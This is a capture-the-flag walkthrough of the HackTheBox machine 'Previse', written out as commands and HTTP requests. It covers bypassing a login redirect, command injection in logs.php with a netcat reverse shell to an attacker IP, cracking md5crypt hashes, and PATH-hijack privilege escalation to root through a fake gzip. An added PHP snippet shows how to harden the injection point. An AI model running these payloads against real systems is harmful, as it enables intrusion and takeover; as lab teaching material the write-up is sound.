HackTheBox: Previse
PREVISE (Linux) Walkthrough
ENUMERATION
MACHINE IP
export IP=10.10.11.104
NMAP SCAN RESULTS
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
Enumerating Web Contents
- Using gobuster to find the directories
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.11.104/ -t 100 -x php,txt,js,html,jpg -q
- Directories Found
/download.php (Status: 200) [Size: 2224]
/login.php (Status: 200) [Size: 2224]
/index.php (Status: 200) [Size: 2224]
/files.php (Status: 200) [Size: 2224]
/nav.php (Status: 200) [Size: 1248]
/header.php (Status: 200) [Size: 980]
/footer.php (Status: 200) [Size: 217]
/css (Status: 200) [Size: 939]
/status.php (Status: 200) [Size: 2224]
/js (Status: 200) [Size: 1155]
/logout.php (Status: 200) [Size: 2224]
/accounts.php (Status: 200) [Size: 2224]
/config.php (Status: 200) [Size: 0]
/logs.php (Status: 200) [Size: 2224]
A little more analysis in Burp (or an active scan) shows that these pages redirect to
/login.php
but their contents can still be recovered from the response. Retrieve the contents of
/accounts.php
and you should be able to make a request that creates an account.
REQUEST TO CREATE ACCOUNT (can be worked out using Burp)
POST /accounts.php HTTP/1.1
Host: 10.10.11.104
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
Origin: http://10.10.11.104
Connection: close
Referer: http://10.10.11.104/site.webmanifest/
Cookie: PHPSESSID=rk9dphd6i16kl9rvg6c98mc7lf
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
username=admin&password=testpass&confirm=testpass&submit=
Now we can log in with this account and enumerate the web panel further.
We found a source code backup at
http://10.10.11.104/files.php
This backup was uploaded by the user
newguy
Downloading and extracting it gives a lot of files to look through.
We found some juicy content in
config.php
<?php
function connectDB(){
$host = 'localhost';
$user = 'root';
$passwd = 'mySQL_p@ssw0rd!:)';
$db = 'previse';
$mycon = new mysqli($host, $user, $passwd, $db);
return $mycon;
}
?>
These may also be a user's credentials.
Let's try SSH with the details above.
DID NOT WORK
GETTING REVERSE SHELL
Let's read the source code files.
In
/logs.php
we can see a line that runs a Python script with a parameter taken straight from the POST body:
$output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");
- The parameter is interpolated into the command line unquoted, so any shell metacharacters in it are interpreted by the shell. We can therefore use a payload like
delim=hello;nc -e /bin/sh 10.10.14.2 4444
- Request with the payload (URL-encoded; here & (%26) is used as the command separator)
POST /logs.php HTTP/1.1
Host: 10.10.11.104
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Origin: http://10.10.11.104
Connection: close
Referer: http://10.10.11.104/site.webmanifest/
Cookie: PHPSESSID=rk9dphd6i16kl9rvg6c98mc7lf
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
delim=hello1111%26nc+-e+/bin/sh+10.10.14.2+4444
- With a listener running, this should get us a reverse shell
nc -lvp 4444
- Stabilizing the netcat reverse shell
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
PRESS CTRL + Z (to background the shell)
stty raw -echo
fg (to foreground the shell)
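As an added example (not code from the box or from the original write-up), this is how the exec() call in logs.php could be hardened: the delimiter name is looked up in a fixed allow-list and the resulting value is passed through escapeshellarg(), so shell metacharacters in the POST body never reach /bin/sh. The allowed delimiter names and the handler function are assumptions.

```php
<?php
// Added example, not the application's own code. Hardened replacement for:
//   $output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");
// The original interpolates the raw POST parameter into a shell command line,
// so a value such as "hello;..." or "hello&..." runs a second command as www-data.

// Assumed allow-list: the only delimiter names log_process.py is expected to accept.
const ALLOWED_DELIMS = ['comma' => 'comma', 'space' => 'space', 'tab' => 'tab'];

/**
 * Build the log-processing command for a user-supplied delimiter name.
 * Returns null when the input is not exactly one of the allowed names.
 */
function buildLogCommand(string $delim): ?string
{
    // Exact-match lookup: anything not in the map (including "comma;id") is rejected.
    if (!array_key_exists($delim, ALLOWED_DELIMS)) {
        return null;
    }
    // escapeshellarg() is defence in depth: even a trusted value is quoted as ONE argument.
    return '/usr/bin/python /opt/scripts/log_process.py '
        . escapeshellarg(ALLOWED_DELIMS[$delim]);
}

// Hypothetical request handler showing how the page would use the builder.
function handleLogsRequest(array $post): string
{
    $cmd = buildLogCommand($post['delim'] ?? '');
    if ($cmd === null) {
        http_response_code(400);
        return 'invalid delimiter';
    }
    $output = [];
    exec($cmd, $output); // only ever runs the fixed command with a quoted argument
    return implode("\n", $output);
}

// Self-check with constructed inputs (run with: php this_file.php).
if (PHP_SAPI === 'cli') {
    assert(buildLogCommand('comma') === "/usr/bin/python /opt/scripts/log_process.py 'comma'");
    assert(buildLogCommand('comma;id') === null);      // ';' separator attempt is rejected
    assert(buildLogCommand('comma&id') === null);      // '&' separator attempt is rejected
    assert(buildLogCommand(' comma') === null);        // no loose matching either
    echo "ok\n";
}
```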
USER FLAG
We currently do not have access to the files of the user
m4lwhere
so we will have to find some way to read
user.txt
Let's find out what is inside the SQL database using the credentials found above.
$user = 'root';
$passwd = 'mySQL_p@ssw0rd!:)';
$db = 'previse';
- Use the commands below to see the data in the database
USE previse;
SHOW TABLES;
SELECT * FROM accounts;
- The passwords we found are stored as md5crypt ($1$) hashes
m4lwhere:$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.
admin:$1$🧂llol$FbsumqZUt.kJRCYaWurtw0
- Cracking the hashes with hashcat (-a 0 is a straight wordlist attack, -m 500 selects md5crypt)
hashcat -a 0 -m 500 encrypted-creds.txt /usr/share/wordlists/rockyou.txt
- Password found
m4lwhere:ilovecody112235!
- SSH into the
m4lwhere
account
ssh m4lwhere@10.10.11.104
- We can find the user flag here
/home/m4lwhere/user.txt
PRIVILEGE ESCALATION
- Let's find out what we are allowed to run as root
sudo -l
- The script below is allowed to run as root
/opt/scripts/access_backup.sh
- Contents of the file
#!/bin/bash
# We always make sure to store logs, we take security SERIOUSLY here
# I know I shouldnt run this as root but I cant figure it out programmatically on my account
# This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time
gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz
Here
gzip
(and date) are invoked by bare name, so the script resolves them through the PATH of the environment sudo runs it in. Because sudo lets our PATH through here, we can prepend a directory we control and create our own
gzip
file there, which will be executed as root in place of the original gzip. (LINUX PRIVILEGE ESCALATION USING PATH VARIABLE; the fix is to call binaries by absolute path or set PATH explicitly inside the script.)
export PATH=/tmp:$PATH
echo $PATH
cd /tmp
echo "nc -e /bin/bash 10.10.14.2 4444" > gzip
chmod 777 gzip
sudo /opt/scripts/access_backup.sh
- Alongside, create a netcat listener to receive the reverse shell
nc -lnvp 4444
We should now have a root shell.
Check
/root/root.txt
for the root flag.